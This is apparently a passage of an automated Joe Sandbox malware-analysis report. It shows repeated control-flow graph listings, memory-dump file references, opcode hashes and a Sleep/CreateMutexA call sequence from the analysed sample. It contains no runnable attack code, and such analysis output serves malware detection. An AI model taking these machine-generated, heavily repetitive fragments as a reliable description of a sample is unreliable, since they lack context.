                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: 3df7c072a7fdf4fe11b2d60c7c301bf0f4a6d6ef0b3cb9ce4fe49ccbcd1627ca
                                                                                                                                                                                                                                                  • Instruction ID: bac51a0a1ec54e787b12a52b75fe3b34cd67cf89a8e77a6595bad29e8d2085c9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3df7c072a7fdf4fe11b2d60c7c301bf0f4a6d6ef0b3cb9ce4fe49ccbcd1627ca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 413127717042048BEB08EB78ED8976DB7A2EFC5320F249629E01CB72D6D77589848756

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 114 e79f44-e79f64 118 e79f66-e79f72 114->118 119 e79f92-e79fae 114->119 120 e79f74-e79f82 118->120 121 e79f88-e79f8f call e8d663 118->121 122 e79fb0-e79fbc 119->122 123 e79fdc-e79ffb 119->123 120->121 126 e7a92b 120->126 121->119 128 e79fd2-e79fd9 call e8d663 122->128 129 e79fbe-e79fcc 122->129 124 e79ffd-e7a009 123->124 125 e7a029-e7a916 call e880c0 123->125 130 e7a01f-e7a026 call e8d663 124->130 131 e7a00b-e7a019 124->131 133 e7a953-e7a994 Sleep CreateMutexA 126->133 134 e7a92b call ea6c6a 126->134 128->123 129->126 129->128 130->125 131->126 131->130 143 e7a9a7-e7a9a8 133->143 144 e7a996-e7a998 133->144 134->133 144->143 146 e7a99a-e7a9a5 144->146 146->143
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: 63fdde9ba058ef6e36f1772983d5b277192e6d8ec28d771ca4ae31661cb3e350
                                                                                                                                                                                                                                                  • Instruction ID: b095bd39e71afaa3f50124e6152bd9a4079c8bb3921bc7a523ca4f4b16ab3f7b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63fdde9ba058ef6e36f1772983d5b277192e6d8ec28d771ca4ae31661cb3e350
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F13125717041048BEB18EB78EC897ADB762EFC5320F28962DE01CF72D1D73589848752

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 148 e7a079-e7a099 152 e7a0c7-e7a0e3 148->152 153 e7a09b-e7a0a7 148->153 156 e7a0e5-e7a0f1 152->156 157 e7a111-e7a130 152->157 154 e7a0bd-e7a0c4 call e8d663 153->154 155 e7a0a9-e7a0b7 153->155 154->152 155->154 160 e7a930-e7a994 call ea6c6a Sleep CreateMutexA 155->160 162 e7a107-e7a10e call e8d663 156->162 163 e7a0f3-e7a101 156->163 158 e7a132-e7a13e 157->158 159 e7a15e-e7a916 call e880c0 157->159 165 e7a154-e7a15b call e8d663 158->165 166 e7a140-e7a14e 158->166 178 e7a9a7-e7a9a8 160->178 179 e7a996-e7a998 160->179 162->157 163->160 163->162 165->159 166->160 166->165 179->178 180 e7a99a-e7a9a5 179->180 180->178
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: fa2146ceba02bd634ac8c98a628912d966933a135b7a4038a7109e9bce2cda2c
                                                                                                                                                                                                                                                  • Instruction ID: 707218d82ed6092f0b3c481c5585de080990d1f84dc6d15feb7a1b4780e17b50
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa2146ceba02bd634ac8c98a628912d966933a135b7a4038a7109e9bce2cda2c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2312371B051009BEB08EB78ED89B6DB762DBC5324F289628E01CB72D1D7369984C756

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 182 e7a1ae-e7a1ce 186 e7a1d0-e7a1dc 182->186 187 e7a1fc-e7a218 182->187 188 e7a1f2-e7a1f9 call e8d663 186->188 189 e7a1de-e7a1ec 186->189 190 e7a246-e7a265 187->190 191 e7a21a-e7a226 187->191 188->187 189->188 192 e7a935 189->192 196 e7a267-e7a273 190->196 197 e7a293-e7a916 call e880c0 190->197 194 e7a23c-e7a243 call e8d663 191->194 195 e7a228-e7a236 191->195 200 e7a953-e7a994 Sleep CreateMutexA 192->200 201 e7a935 call ea6c6a 192->201 194->190 195->192 195->194 203 e7a275-e7a283 196->203 204 e7a289-e7a290 call e8d663 196->204 211 e7a9a7-e7a9a8 200->211 212 e7a996-e7a998 200->212 201->200 203->192 203->204 204->197 212->211 214 e7a99a-e7a9a5 212->214 214->211
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00E7A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID: T2
                                                                                                                                                                                                                                                  • API String ID: 1464230837-631260391
                                                                                                                                                                                                                                                  • Opcode ID: 3168f323fb2b3a2782b49e4f7f4d55c1ad1d004b7f0f714497cd43108a118933
                                                                                                                                                                                                                                                  • Instruction ID: 2d31be7c14db9a43388255f07dae6602371a2eb77bf874e88cb26b1f44a1d6b4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3168f323fb2b3a2782b49e4f7f4d55c1ad1d004b7f0f714497cd43108a118933
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75314871B051409BEB08EB78EC8D76DB762EBC6310F28972CE01CB72E1D73689848756

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
